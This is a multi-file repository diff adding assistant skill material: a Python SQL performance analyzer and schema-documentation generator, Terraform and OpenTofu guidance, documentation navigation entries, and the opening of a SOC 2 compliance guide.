where_match = re.search(r'\bWHERE\b(.+?)(?:\bGROUP\b|\bORDER\b|\bLIMIT\b|\bHAVING\b|;|$)',
sql, re.IGNORECASE | re.DOTALL)
if not where_match:
return None
where_clause = where_match.group(1)
non_sargable = re.search(
r'\b(YEAR|MONTH|DAY|DATE|UPPER|LOWER|TRIM|CAST|COALESCE|IFNULL|NVL)\s*\(',
where_clause, re.IGNORECASE
)
if non_sargable:
func = non_sargable.group(1).upper()
return Issue(
severity="warning",
rule="non-sargable",
message=f"Function {func}() on column in WHERE prevents index usage.",
suggestion="Rewrite to compare the raw column against transformed constants.",
)
return None
def check_leading_wildcard(sql: str) -> Optional[Issue]:
"""Detect LIKE '%...' patterns."""
if re.search(r"LIKE\s+'%", sql, re.IGNORECASE):
return Issue(
severity="warning",
rule="leading-wildcard",
message="LIKE with leading wildcard prevents index usage.",
suggestion="Use full-text search (GIN index, FULLTEXT, FTS5) for substring matching.",
)
return None
def check_order_by_rand(sql: str) -> Optional[Issue]:
"""Detect ORDER BY RAND() / RANDOM()."""
if re.search(r'ORDER\s+BY\s+(RAND|RANDOM)\s*\(\)', sql, re.IGNORECASE):
return Issue(
severity="warning",
rule="order-by-rand",
message="ORDER BY RAND() scans and sorts the entire table.",
suggestion="Use application-side random sampling or TABLESAMPLE.",
)
return None
def check_union_vs_union_all(sql: str) -> Optional[Issue]:
"""Detect UNION without ALL (unnecessary dedup)."""
if re.search(r'\bUNION\b(?!\s+ALL\b)', sql, re.IGNORECASE):
return Issue(
severity="info",
rule="union-without-all",
message="UNION performs deduplication sort; use UNION ALL if duplicates are acceptable.",
suggestion="Replace UNION with UNION ALL unless you specifically need deduplication.",
)
return None
def check_not_in_subquery(sql: str) -> Optional[Issue]:
"""Detect NOT IN (SELECT ...) which is NULL-unsafe."""
if re.search(r'\bNOT\s+IN\s*\(\s*SELECT\b', sql, re.IGNORECASE):
return Issue(
severity="warning",
rule="not-in-subquery",
message="NOT IN with subquery returns no rows if any subquery result is NULL.",
suggestion="Use NOT EXISTS (SELECT 1 ...) instead.",
)
return None
# Every rule checker, executed in order by analyze_query(); each takes the
# SQL text and returns an Issue or None. Register new rules here.
ALL_CHECKS = [
    check_select_star,
    check_missing_where,
    check_cartesian_join,
    check_subquery_in_select,
    check_missing_limit,
    check_function_on_column,
    check_leading_wildcard,
    check_order_by_rand,
    check_union_vs_union_all,
    check_not_in_subquery,
]
# ---------------------------------------------------------------------------
# Analysis engine
# ---------------------------------------------------------------------------
def analyze_query(sql: str, dialect: str = "postgres") -> QueryAnalysis:
    """Run every registered check against one SQL statement and score it.

    Scoring starts at 100 and deducts 25/10/5 points per critical/warning/
    info issue, floored at 0. The dialect argument is accepted for parity
    with the CLI but is not consulted by the current rule set.
    """
    issues = [found for found in (check(sql) for check in ALL_CHECKS) if found]
    penalties = {"critical": 25, "warning": 10}
    score = 100
    for issue in issues:
        score -= penalties.get(issue.severity, 5)
    return QueryAnalysis(query=sql.strip(), issues=issues, score=max(0, score))
def split_queries(text: str) -> List[str]:
    """Split SQL text on semicolons into trimmed statements (terminator restored).

    Fragments of 5 characters or fewer are discarded as noise (blank
    segments, stray terminators).
    """
    statements = []
    for fragment in text.split(";"):
        trimmed = fragment.strip()
        if len(trimmed) > 5:
            statements.append(trimmed + ";")
    return statements
# ---------------------------------------------------------------------------
# Output formatting
# ---------------------------------------------------------------------------
# Plain-text severity tags used in the human-readable report.
SEVERITY_ICONS = {"critical": "[CRITICAL]", "warning": "[WARNING]", "info": "[INFO]"}


def format_text(analyses: "List[QueryAnalysis]") -> str:
    """Render analysis results as a human-readable text report."""
    out = []
    for number, analysis in enumerate(analyses, 1):
        preview = analysis.query[:120] + ("..." if len(analysis.query) > 120 else "")
        out.append("=" * 60)
        out.append(f"Query {number} (Score: {analysis.score}/100)")
        out.append(f"  {preview}")
        out.append("")
        if not analysis.issues:
            out.append("  No issues detected.")
        for issue in analysis.issues:
            tag = SEVERITY_ICONS.get(issue.severity, "")
            out.append(f"  {tag} {issue.rule}: {issue.message}")
            out.append(f"     -> {issue.suggestion}")
        out.append("")
    return "\n".join(out)
def format_json(analyses: "List[QueryAnalysis]") -> str:
    """Render analysis results as pretty-printed JSON."""
    payload = {
        "analyses": [analysis.to_dict() for analysis in analyses],
        "total_queries": len(analyses),
    }
    return json.dumps(payload, indent=2)
# ---------------------------------------------------------------------------
# CLI
# ---------------------------------------------------------------------------
def main():
    """CLI entry point: read SQL (inline or from a file), analyze, and report."""
    parser = argparse.ArgumentParser(
        description="Analyze SQL queries for common performance issues.",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  %(prog)s --query "SELECT * FROM users"
  %(prog)s --query queries.sql --dialect mysql
  %(prog)s --query "DELETE FROM orders" --json
""",
    )
    parser.add_argument(
        "--query", required=True,
        help="SQL query string or path to a .sql file",
    )
    parser.add_argument(
        "--dialect", choices=["postgres", "mysql", "sqlite", "sqlserver"],
        default="postgres", help="SQL dialect (default: postgres)",
    )
    parser.add_argument(
        "--json", action="store_true", dest="json_output",
        help="Output results as JSON",
    )
    args = parser.parse_args()

    # --query doubles as a file path; read the file when one exists on disk.
    sql_text = args.query
    if os.path.isfile(args.query):
        with open(args.query, "r") as fh:
            sql_text = fh.read()

    # Fall back to treating the entire input as one query when splitting
    # yields nothing (e.g. short input with no semicolons).
    statements = split_queries(sql_text) or [sql_text.strip()]
    results = [analyze_query(stmt, args.dialect) for stmt in statements]
    renderer = format_json if args.json_output else format_text
    print(renderer(results))


if __name__ == "__main__":
    main()

View File

@@ -0,0 +1,315 @@
#!/usr/bin/env python3
"""
Schema Explorer
Generates schema documentation from database introspection queries.
Outputs the introspection SQL and sample documentation templates
for PostgreSQL, MySQL, SQLite, and SQL Server.
Since this tool runs without a live database connection, it generates:
1. The introspection queries you need to run
2. Documentation templates from the results
3. Sample schema docs for common table patterns
Usage:
python schema_explorer.py --dialect postgres --tables all --format md
python schema_explorer.py --dialect mysql --tables users,orders --format json
python schema_explorer.py --dialect sqlite --tables all --json
"""
import argparse
import json
import sys
import textwrap
from dataclasses import dataclass, asdict
from typing import List, Optional, Dict
# ---------------------------------------------------------------------------
# Introspection query templates per dialect
# ---------------------------------------------------------------------------
INTROSPECTION_QUERIES: Dict[str, Dict[str, str]] = {
"postgres": {
"tables": textwrap.dedent("""\
SELECT table_name
FROM information_schema.tables
WHERE table_schema = 'public' AND table_type = 'BASE TABLE'
ORDER BY table_name;"""),
"columns": textwrap.dedent("""\
SELECT table_name, column_name, data_type, character_maximum_length,
is_nullable, column_default
FROM information_schema.columns
WHERE table_schema = 'public' {table_filter}
ORDER BY table_name, ordinal_position;"""),
"primary_keys": textwrap.dedent("""\
SELECT tc.table_name, kcu.column_name
FROM information_schema.table_constraints tc
JOIN information_schema.key_column_usage kcu
ON tc.constraint_name = kcu.constraint_name
WHERE tc.constraint_type = 'PRIMARY KEY' AND tc.table_schema = 'public'
ORDER BY tc.table_name;"""),
"foreign_keys": textwrap.dedent("""\
SELECT tc.table_name, kcu.column_name,
ccu.table_name AS foreign_table, ccu.column_name AS foreign_column
FROM information_schema.table_constraints tc
JOIN information_schema.key_column_usage kcu
ON tc.constraint_name = kcu.constraint_name
JOIN information_schema.constraint_column_usage ccu
ON tc.constraint_name = ccu.constraint_name
WHERE tc.constraint_type = 'FOREIGN KEY'
ORDER BY tc.table_name;"""),
"indexes": textwrap.dedent("""\
SELECT schemaname, tablename, indexname, indexdef
FROM pg_indexes
WHERE schemaname = 'public'
ORDER BY tablename, indexname;"""),
"table_sizes": textwrap.dedent("""\
SELECT relname AS table_name,
pg_size_pretty(pg_total_relation_size(relid)) AS total_size,
pg_size_pretty(pg_relation_size(relid)) AS data_size,
pg_size_pretty(pg_total_relation_size(relid) - pg_relation_size(relid)) AS index_size
FROM pg_catalog.pg_statio_user_tables
ORDER BY pg_total_relation_size(relid) DESC;"""),
},
"mysql": {
"tables": textwrap.dedent("""\
SELECT table_name
FROM information_schema.tables
WHERE table_schema = DATABASE() AND table_type = 'BASE TABLE'
ORDER BY table_name;"""),
"columns": textwrap.dedent("""\
SELECT table_name, column_name, column_type, is_nullable,
column_default, column_key, extra
FROM information_schema.columns
WHERE table_schema = DATABASE() {table_filter}
ORDER BY table_name, ordinal_position;"""),
"foreign_keys": textwrap.dedent("""\
SELECT table_name, column_name, referenced_table_name, referenced_column_name
FROM information_schema.key_column_usage
WHERE table_schema = DATABASE() AND referenced_table_name IS NOT NULL
ORDER BY table_name;"""),
"indexes": textwrap.dedent("""\
SELECT table_name, index_name, non_unique, column_name, seq_in_index
FROM information_schema.statistics
WHERE table_schema = DATABASE()
ORDER BY table_name, index_name, seq_in_index;"""),
"table_sizes": textwrap.dedent("""\
SELECT table_name, table_rows,
ROUND(data_length / 1024 / 1024, 2) AS data_mb,
ROUND(index_length / 1024 / 1024, 2) AS index_mb
FROM information_schema.tables
WHERE table_schema = DATABASE()
ORDER BY data_length DESC;"""),
},
"sqlite": {
"tables": textwrap.dedent("""\
SELECT name FROM sqlite_master
WHERE type = 'table' AND name NOT LIKE 'sqlite_%'
ORDER BY name;"""),
"columns": textwrap.dedent("""\
-- Run for each table:
PRAGMA table_info({table_name});"""),
"foreign_keys": textwrap.dedent("""\
-- Run for each table:
PRAGMA foreign_key_list({table_name});"""),
"indexes": textwrap.dedent("""\
SELECT name, tbl_name, sql FROM sqlite_master
WHERE type = 'index'
ORDER BY tbl_name, name;"""),
"schema_dump": textwrap.dedent("""\
SELECT name, sql FROM sqlite_master
WHERE type = 'table'
ORDER BY name;"""),
},
"sqlserver": {
"tables": textwrap.dedent("""\
SELECT TABLE_NAME
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_TYPE = 'BASE TABLE'
ORDER BY TABLE_NAME;"""),
"columns": textwrap.dedent("""\
SELECT t.name AS table_name, c.name AS column_name,
ty.name AS data_type, c.max_length, c.precision, c.scale,
c.is_nullable, dc.definition AS default_value
FROM sys.columns c
JOIN sys.tables t ON c.object_id = t.object_id
JOIN sys.types ty ON c.user_type_id = ty.user_type_id
LEFT JOIN sys.default_constraints dc ON c.default_object_id = dc.object_id
{table_filter}
ORDER BY t.name, c.column_id;"""),
"foreign_keys": textwrap.dedent("""\
SELECT fk.name AS fk_name,
tp.name AS parent_table, cp.name AS parent_column,
tr.name AS referenced_table, cr.name AS referenced_column
FROM sys.foreign_keys fk
JOIN sys.foreign_key_columns fkc ON fk.object_id = fkc.constraint_object_id
JOIN sys.tables tp ON fkc.parent_object_id = tp.object_id
JOIN sys.columns cp ON fkc.parent_object_id = cp.object_id AND fkc.parent_column_id = cp.column_id
JOIN sys.tables tr ON fkc.referenced_object_id = tr.object_id
JOIN sys.columns cr ON fkc.referenced_object_id = cr.object_id AND fkc.referenced_column_id = cr.column_id
ORDER BY tp.name;"""),
"indexes": textwrap.dedent("""\
SELECT t.name AS table_name, i.name AS index_name,
i.type_desc, i.is_unique, c.name AS column_name,
ic.key_ordinal
FROM sys.indexes i
JOIN sys.index_columns ic ON i.object_id = ic.object_id AND i.index_id = ic.index_id
JOIN sys.columns c ON ic.object_id = c.object_id AND ic.column_id = c.column_id
JOIN sys.tables t ON i.object_id = t.object_id
WHERE i.name IS NOT NULL
ORDER BY t.name, i.name, ic.key_ordinal;"""),
},
}
# ---------------------------------------------------------------------------
# Documentation generators
# ---------------------------------------------------------------------------
# Canned table metadata used to render example documentation sections for
# tables the user requests; tables not listed here get a placeholder note.
SAMPLE_TABLES = {
    "users": {
        "columns": [
            {"name": "id", "type": "SERIAL / INT", "nullable": "NO", "default": "auto", "notes": "Primary key"},
            {"name": "email", "type": "VARCHAR(255)", "nullable": "NO", "default": "-", "notes": "Unique, indexed"},
            {"name": "name", "type": "VARCHAR(255)", "nullable": "YES", "default": "NULL", "notes": "Display name"},
            {"name": "password_hash", "type": "VARCHAR(255)", "nullable": "NO", "default": "-", "notes": "bcrypt hash"},
            {"name": "created_at", "type": "TIMESTAMP", "nullable": "NO", "default": "NOW()", "notes": ""},
            {"name": "updated_at", "type": "TIMESTAMP", "nullable": "NO", "default": "NOW()", "notes": ""},
        ],
        "indexes": ["PRIMARY KEY (id)", "UNIQUE INDEX (email)"],
        "foreign_keys": [],
    },
    "orders": {
        "columns": [
            {"name": "id", "type": "SERIAL / INT", "nullable": "NO", "default": "auto", "notes": "Primary key"},
            {"name": "user_id", "type": "INTEGER", "nullable": "NO", "default": "-", "notes": "FK -> users.id"},
            {"name": "status", "type": "VARCHAR(50)", "nullable": "NO", "default": "'pending'", "notes": "pending/paid/shipped/cancelled"},
            {"name": "total", "type": "DECIMAL(19,4)", "nullable": "NO", "default": "0", "notes": "Order total in cents"},
            {"name": "created_at", "type": "TIMESTAMP", "nullable": "NO", "default": "NOW()", "notes": ""},
        ],
        "indexes": ["PRIMARY KEY (id)", "INDEX (user_id)", "INDEX (status, created_at)"],
        "foreign_keys": ["user_id -> users.id ON DELETE CASCADE"],
    },
}
def generate_md(dialect: str, tables: List[str]) -> str:
    """Generate markdown schema documentation.

    Args:
        dialect: Dialect key into INTROSPECTION_QUERIES
            ("postgres", "mysql", "sqlite", or "sqlserver").
        tables: Requested table names, or a list containing "all" to
            document every sample table with no SQL table filter.

    Returns:
        The complete markdown document as a single string.
    """
    lines = [f"# Database Schema Documentation ({dialect.upper()})\n"]
    lines.append("Generated by sql-database-assistant schema_explorer.\n")
    # Introspection queries section.
    lines.append("## Introspection Queries\n")
    lines.append("Run these queries against your database to extract schema information:\n")
    queries = INTROSPECTION_QUERIES.get(dialect, {})
    # Placeholder substitutions depend only on `tables`, so compute them once
    # instead of once per query.
    table_filter = ""
    if "all" not in tables:
        tlist = ", ".join(f"'{t}'" for t in tables)
        table_filter = f"AND table_name IN ({tlist})"
    first_table = tables[0] if tables and tables[0] != "all" else "TABLE_NAME"
    for qname, qsql in queries.items():
        qsql = qsql.replace("{table_filter}", table_filter)
        qsql = qsql.replace("{table_name}", first_table)
        lines.append(f"### {qname.replace('_', ' ').title()}\n")
        lines.append(f"```sql\n{qsql}\n```\n")
    # Sample documentation section.
    lines.append("## Sample Table Documentation\n")
    lines.append("Below is an example of the documentation format produced from query results:\n")
    show_tables = tables if "all" not in tables else list(SAMPLE_TABLES.keys())
    for tname in show_tables:
        sample = SAMPLE_TABLES.get(tname)
        lines.append(f"### {tname}\n")
        if not sample:
            lines.append("_No sample data available. Run introspection queries above._\n")
            continue
        lines.append("| Column | Type | Nullable | Default | Notes |")
        lines.append("|--------|------|----------|---------|-------|")
        for col in sample["columns"]:
            lines.append(f"| {col['name']} | {col['type']} | {col['nullable']} | {col['default']} | {col['notes']} |")
        lines.append("")
        if sample["indexes"]:
            lines.append("**Indexes:** " + ", ".join(sample["indexes"]))
            # Blank line keeps the Foreign Keys line in its own markdown
            # paragraph instead of merging with the Indexes line.
            lines.append("")
        if sample["foreign_keys"]:
            lines.append("**Foreign Keys:** " + ", ".join(sample["foreign_keys"]))
        lines.append("")
    return "\n".join(lines)
def generate_json_output(dialect: str, tables: List[str]) -> dict:
    """Generate JSON schema documentation.

    Args:
        dialect: Dialect key into INTROSPECTION_QUERIES.
        tables: Requested table names, or a list containing "all" to
            include every sample table with no SQL table filter.

    Returns:
        A dict holding the placeholder-resolved introspection queries,
        the sample documentation for the requested tables, and usage
        instructions.
    """
    queries = INTROSPECTION_QUERIES.get(dialect, {})
    # Placeholder substitutions depend only on `tables`; compute them once
    # rather than once per query.
    table_filter = ""
    if "all" not in tables:
        tlist = ", ".join(f"'{t}'" for t in tables)
        table_filter = f"AND table_name IN ({tlist})"
    first_table = tables[0] if tables and tables[0] != "all" else "TABLE_NAME"
    processed = {
        qname: qsql.replace("{table_filter}", table_filter).replace("{table_name}", first_table)
        for qname, qsql in queries.items()
    }
    show_tables = tables if "all" not in tables else list(SAMPLE_TABLES.keys())
    # Only include tables for which sample documentation actually exists.
    sample_docs = {t: SAMPLE_TABLES[t] for t in show_tables if t in SAMPLE_TABLES}
    return {
        "dialect": dialect,
        "requested_tables": tables,
        "introspection_queries": processed,
        "sample_documentation": sample_docs,
        "instructions": "Run the introspection queries against your database, then use the results to populate documentation in the sample format shown.",
    }
# ---------------------------------------------------------------------------
# CLI
# ---------------------------------------------------------------------------
def main():
    """CLI entry point: parse arguments and print schema documentation."""
    parser = argparse.ArgumentParser(
        description="Generate schema documentation from database introspection.",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  %(prog)s --dialect postgres --tables all --format md
  %(prog)s --dialect mysql --tables users,orders --format json
  %(prog)s --dialect sqlite --tables all --json
""",
    )
    parser.add_argument(
        "--dialect", required=True, choices=["postgres", "mysql", "sqlite", "sqlserver"],
        help="Target database dialect",
    )
    parser.add_argument(
        "--tables", default="all",
        help="Comma-separated table names or 'all' (default: all)",
    )
    parser.add_argument(
        "--format", choices=["md", "json"], default="md", dest="fmt",
        help="Output format (default: md)",
    )
    parser.add_argument(
        "--json", action="store_true", dest="json_output",
        help="Output as JSON (overrides --format)",
    )
    args = parser.parse_args()
    # Drop empty tokens so stray commas ("users,,orders" or "users,") don't
    # inject empty table names into the generated SQL filters; an entirely
    # empty list falls back to "all".
    tables = [t.strip() for t in args.tables.split(",") if t.strip()] or ["all"]
    if args.json_output or args.fmt == "json":
        result = generate_json_output(args.dialect, tables)
        print(json.dumps(result, indent=2))
    else:
        print(generate_md(args.dialect, tables))


if __name__ == "__main__":
    main()

View File

@@ -459,6 +459,259 @@ Flag these without being asked:
---
## Multi-Cloud Provider Configuration
When a single root module must provision across AWS, Azure, and GCP simultaneously.
### Provider Aliasing Pattern
```hcl
terraform {
required_providers {
aws = {
source = "hashicorp/aws"
version = "~> 5.0"
}
azurerm = {
source = "hashicorp/azurerm"
version = "~> 3.0"
}
google = {
source = "hashicorp/google"
version = "~> 5.0"
}
}
}
provider "aws" {
region = var.aws_region
}
provider "azurerm" {
features {}
subscription_id = var.azure_subscription_id
}
provider "google" {
project = var.gcp_project_id
region = var.gcp_region
}
```
### Shared Variables Across Providers
```hcl
variable "environment" {
description = "Environment name used across all providers"
type = string
validation {
condition = contains(["dev", "staging", "prod"], var.environment)
error_message = "Must be dev, staging, or prod."
}
}
locals {
common_tags = {
environment = var.environment
managed_by = "terraform"
project = var.project_name
}
}
```
### When to Use Multi-Cloud
- **Yes**: Regulatory requirements mandate data residency across providers, or the org has existing workloads on multiple clouds.
- **No**: "Avoiding vendor lock-in" alone is not sufficient justification. Multi-cloud doubles operational complexity. Prefer single-cloud unless there is a concrete business requirement.
---
## OpenTofu Compatibility
OpenTofu is an open-source fork of Terraform maintained by the Linux Foundation under the MPL 2.0 license.
### Migration from Terraform to OpenTofu
```bash
# 1. Install OpenTofu
brew install opentofu # macOS
snap install --classic tofu # Linux
# 2. Replace the binary — state files are compatible
tofu init # Re-initializes with OpenTofu
tofu plan # Identical plan output
tofu apply # Same apply workflow
```
### License Considerations
| | Terraform (1.6+) | OpenTofu |
|---|---|---|
| **License** | BSL 1.1 (source-available) | MPL 2.0 (open-source) |
| **Commercial use** | Restricted for competing products | Unrestricted |
| **Community governance** | HashiCorp | Linux Foundation |
### Feature Parity
OpenTofu tracks Terraform 1.6.x features. Key additions unique to OpenTofu:
- Client-side state encryption (`tofu init -encryption`)
- Early variable/locals evaluation
- Provider-defined functions
### When to Choose OpenTofu
- You need a fully open-source license for your supply chain.
- You want client-side state encryption without Terraform Cloud.
- Otherwise, either tool works — the HCL syntax and provider ecosystem are identical.
---
## Infracost Integration
Infracost estimates cloud costs from Terraform code before resources are provisioned.
### PR Workflow
```bash
# Show cost breakdown for current code
infracost breakdown --path .
# Compare cost difference between current branch and main
infracost diff --path . --compare-to infracost-base.json
```
### GitHub Actions Cost Comment
```yaml
# .github/workflows/infracost.yml
name: Infracost
on: [pull_request]
jobs:
cost:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: infracost/actions/setup@v3
with:
api-key: ${{ secrets.INFRACOST_API_KEY }}
- run: infracost breakdown --path ./terraform --format json --out-file /tmp/infracost.json
- run: infracost comment github --path /tmp/infracost.json --repo $GITHUB_REPOSITORY --pull-request ${{ github.event.pull_request.number }} --github-token ${{ secrets.GITHUB_TOKEN }} --behavior update
```
### Budget Thresholds and Cost Policy
```yaml
# infracost.yml — policy file
version: 0.1
policies:
- path: "*"
max_monthly_cost: "5000" # Fail PR if estimated cost exceeds $5,000/month
max_cost_increase: "500" # Fail PR if cost increase exceeds $500/month
```
---
## Import Existing Infrastructure
Bring manually-created resources under Terraform management.
### terraform import Workflow
```bash
# 1. Write the resource block first (empty body is fine)
# main.tf:
# resource "aws_s3_bucket" "legacy" {}
# 2. Import the resource into state
terraform import aws_s3_bucket.legacy my-existing-bucket-name
# 3. Run plan to see attribute diff
terraform plan
# 4. Fill in the resource block until plan shows no changes
```
### Bulk Import with Config Generation (Terraform 1.5+)
```bash
# Generate HCL for imported resources
terraform plan -generate-config-out=generated.tf
# Review generated.tf, then move resources into proper files
```
### Common Pitfalls
- **Resource drift after import**: The imported resource may have attributes Terraform does not manage. Run `terraform plan` immediately and resolve every diff.
- **State manipulation**: Use `terraform state mv` to rename or reorganize. Use `terraform state rm` to remove without destroying. Always back up state before manipulation: `terraform state pull > backup.tfstate`.
- **Sensitive defaults**: Imported resources may expose secrets in state. Restrict state access and enable encryption.
---
## Terragrunt Patterns
Terragrunt is a thin wrapper around Terraform that provides DRY configuration for multi-environment setups.
### Root terragrunt.hcl (Shared Config)
```hcl
# terragrunt.hcl (root)
remote_state {
backend = "s3"
generate = {
path = "backend.tf"
if_exists = "overwrite_terragrunt"
}
config = {
bucket = "my-org-terraform-state"
key = "${path_relative_to_include()}/terraform.tfstate"
region = "us-east-1"
encrypt = true
dynamodb_table = "terraform-locks"
}
}
```
### Child terragrunt.hcl (Environment Override)
```hcl
# prod/vpc/terragrunt.hcl
include "root" {
path = find_in_parent_folders()
}
terraform {
source = "../../modules/vpc"
}
inputs = {
environment = "prod"
cidr_block = "10.0.0.0/16"
}
```
### Dependencies Between Modules
```hcl
# prod/eks/terragrunt.hcl
dependency "vpc" {
config_path = "../vpc"
}
inputs = {
vpc_id = dependency.vpc.outputs.vpc_id
subnet_ids = dependency.vpc.outputs.private_subnet_ids
}
```
### When Terragrunt Adds Value
- **Yes**: 3+ environments with identical module structure, shared backend config, or cross-module dependencies.
- **No**: Single environment, small team, or simple directory-based isolation already works. Terragrunt adds a learning curve and another binary to manage.
---
## Installation
### One-liner (any tool)

View File

@@ -122,9 +122,11 @@ nav:
- Overview: skills/engineering-team/index.md
- "A11y Audit": skills/engineering-team/a11y-audit.md
- "AWS Solution Architect": skills/engineering-team/aws-solution-architect.md
- "Azure Cloud Architect": skills/engineering-team/azure-cloud-architect.md
- "Code Reviewer": skills/engineering-team/code-reviewer.md
- "Email Template Builder": skills/engineering-team/email-template-builder.md
- "Incident Commander": skills/engineering-team/incident-commander.md
- "GCP Cloud Architect": skills/engineering-team/gcp-cloud-architect.md
- "Google Workspace CLI": skills/engineering-team/google-workspace-cli.md
- "Microsoft 365 Tenant Manager": skills/engineering-team/ms365-tenant-manager.md
- Playwright Pro:
@@ -158,6 +160,7 @@ nav:
- "Senior QA Engineer": skills/engineering-team/senior-qa.md
- "Senior SecOps Engineer": skills/engineering-team/senior-secops.md
- "Senior Security Engineer": skills/engineering-team/senior-security.md
- "Security Pen Testing": skills/engineering-team/security-pen-testing.md
- "Stripe Integration Expert": skills/engineering-team/stripe-integration-expert.md
- "TDD Guide": skills/engineering-team/tdd-guide.md
- "Tech Stack Evaluator": skills/engineering-team/tech-stack-evaluator.md
@@ -174,6 +177,7 @@ nav:
- "Agent Workflow Designer": skills/engineering/agent-workflow-designer.md
- "API Design Reviewer": skills/engineering/api-design-reviewer.md
- "API Test Suite Builder": skills/engineering/api-test-suite-builder.md
- "Browser Automation": skills/engineering/browser-automation.md
- "Changelog Generator": skills/engineering/changelog-generator.md
- "CI/CD Pipeline Builder": skills/engineering/ci-cd-pipeline-builder.md
- "Codebase Onboarding": skills/engineering/codebase-onboarding.md
@@ -193,8 +197,11 @@ nav:
- "RAG Architect": skills/engineering/rag-architect.md
- "Release Manager": skills/engineering/release-manager.md
- "Runbook Generator": skills/engineering/runbook-generator.md
- "Secrets Vault Manager": skills/engineering/secrets-vault-manager.md
- "Skill Security Auditor": skills/engineering/skill-security-auditor.md
- "Skill Tester": skills/engineering/skill-tester.md
- "Spec-Driven Workflow": skills/engineering/spec-driven-workflow.md
- "SQL Database Assistant": skills/engineering/sql-database-assistant.md
- "Tech Debt Tracker": skills/engineering/tech-debt-tracker.md
- "Terraform Patterns": skills/engineering/terraform-patterns.md
- "Helm Chart Builder": skills/engineering/helm-chart-builder.md
@@ -329,6 +336,7 @@ nav:
- "Quality Manager - ISO 13485": skills/ra-qm-team/quality-manager-qms-iso13485.md
- "Regulatory Affairs Head": skills/ra-qm-team/regulatory-affairs-head.md
- "Risk Management Specialist": skills/ra-qm-team/risk-management-specialist.md
- "SOC 2 Compliance": skills/ra-qm-team/soc2-compliance.md
- Business & Growth:
- Overview: skills/business-growth/index.md
- "Contract & Proposal Writer": skills/business-growth/contract-and-proposal-writer.md

View File

@@ -0,0 +1,417 @@
---
name: "soc2-compliance"
description: "Use when the user asks to prepare for SOC 2 audits, map Trust Service Criteria, build control matrices, collect audit evidence, perform gap analysis, or assess SOC 2 Type I vs Type II readiness."
---
# SOC 2 Compliance
SOC 2 Type I and Type II compliance preparation for SaaS companies. Covers Trust Service Criteria mapping, control matrix generation, evidence collection, gap analysis, and audit readiness assessment.
## Table of Contents
- [Overview](#overview)
- [Trust Service Criteria](#trust-service-criteria)
- [Control Matrix Generation](#control-matrix-generation)
- [Gap Analysis Workflow](#gap-analysis-workflow)
- [Evidence Collection](#evidence-collection)
- [Audit Readiness Checklist](#audit-readiness-checklist)
- [Vendor Management](#vendor-management)
- [Continuous Compliance](#continuous-compliance)
- [Anti-Patterns](#anti-patterns)
- [Tools](#tools)
- [References](#references)
- [Cross-References](#cross-references)
---
## Overview
### What Is SOC 2?
SOC 2 (System and Organization Controls 2) is an auditing framework developed by the AICPA that evaluates how a service organization manages customer data. It applies to any technology company that stores, processes, or transmits customer information — primarily SaaS, cloud infrastructure, and managed service providers.
### Type I vs Type II
| Aspect | Type I | Type II |
|--------|--------|---------|
| **Scope** | Design of controls at a point in time | Design AND operating effectiveness over a period |
| **Duration** | Snapshot (single date) | Observation window (3-12 months, typically 6) |
| **Evidence** | Control descriptions, policies | Control descriptions + operating evidence (logs, tickets, screenshots) |
| **Cost** | $20K-$50K (audit fees) | $30K-$100K+ (audit fees) |
| **Timeline** | 1-2 months (audit phase) | 6-12 months (observation + audit) |
| **Best For** | First-time compliance, rapid market need | Mature organizations, enterprise customers |
### Who Needs SOC 2?
- **SaaS companies** selling to enterprise customers
- **Cloud infrastructure providers** handling customer workloads
- **Data processors** managing PII, PHI, or financial data
- **Managed service providers** with access to client systems
- **Any vendor** whose customers require third-party assurance
### Typical Journey
```
Gap Assessment → Remediation → Type I Audit → Observation Period → Type II Audit → Annual Renewal
(4-8 wk) (8-16 wk) (4-6 wk) (6-12 mo) (4-6 wk) (ongoing)
```
---
## Trust Service Criteria
SOC 2 is organized around five Trust Service Criteria (TSC) categories. **Security** is required for every SOC 2 report; the remaining four are optional and selected based on business need.
### Security (Common Criteria CC1-CC9) — Required
The foundation of every SOC 2 report. Maps to COSO 2013 principles.
| Criteria | Domain | Key Controls |
|----------|--------|-------------|
| **CC1** | Control Environment | Integrity/ethics, board oversight, org structure, competence, accountability |
| **CC2** | Communication & Information | Internal/external communication, information quality |
| **CC3** | Risk Assessment | Risk identification, fraud risk, change impact analysis |
| **CC4** | Monitoring Activities | Ongoing monitoring, deficiency evaluation, corrective actions |
| **CC5** | Control Activities | Policies/procedures, technology controls, deployment through policies |
| **CC6** | Logical & Physical Access | Access provisioning, authentication, encryption, physical restrictions |
| **CC7** | System Operations | Vulnerability management, anomaly detection, incident response |
| **CC8** | Change Management | Change authorization, testing, approval, emergency changes |
| **CC9** | Risk Mitigation | Vendor/business partner risk management |
### Availability (A1) — Optional
| Criteria | Focus | Key Controls |
|----------|-------|-------------|
| **A1.1** | Capacity management | Infrastructure scaling, resource monitoring, capacity planning |
| **A1.2** | Recovery operations | Backup procedures, disaster recovery, BCP testing |
| **A1.3** | Recovery testing | DR drills, failover testing, RTO/RPO validation |
**Select when:** Customers depend on your uptime; you have SLAs; downtime causes direct business impact.
### Confidentiality (C1) — Optional
| Criteria | Focus | Key Controls |
|----------|-------|-------------|
| **C1.1** | Identification | Data classification policy, confidential data inventory |
| **C1.2** | Protection | Encryption at rest and in transit, DLP, access restrictions |
| **C1.3** | Disposal | Secure deletion procedures, media sanitization, retention enforcement |
**Select when:** You handle trade secrets, proprietary data, or contractually confidential information.
### Processing Integrity (PI1) — Optional
| Criteria | Focus | Key Controls |
|----------|-------|-------------|
| **PI1.1** | Accuracy | Input validation, processing checks, output verification |
| **PI1.2** | Completeness | Transaction monitoring, reconciliation, error handling |
| **PI1.3** | Timeliness | SLA monitoring, processing delay alerts, batch job monitoring |
| **PI1.4** | Authorization | Processing authorization controls, segregation of duties |
**Select when:** Data accuracy is critical (financial processing, healthcare records, analytics platforms).
### Privacy (P1-P8) — Optional
| Criteria | Focus | Key Controls |
|----------|-------|-------------|
| **P1** | Notice | Privacy policy, data collection notice, purpose limitation |
| **P2** | Choice & Consent | Opt-in/opt-out, consent management, preference tracking |
| **P3** | Collection | Minimal collection, lawful basis, purpose specification |
| **P4** | Use, Retention, Disposal | Purpose limitation, retention schedules, secure disposal |
| **P5** | Access | Data subject access requests, correction rights |
| **P6** | Disclosure & Notification | Third-party sharing, breach notification |
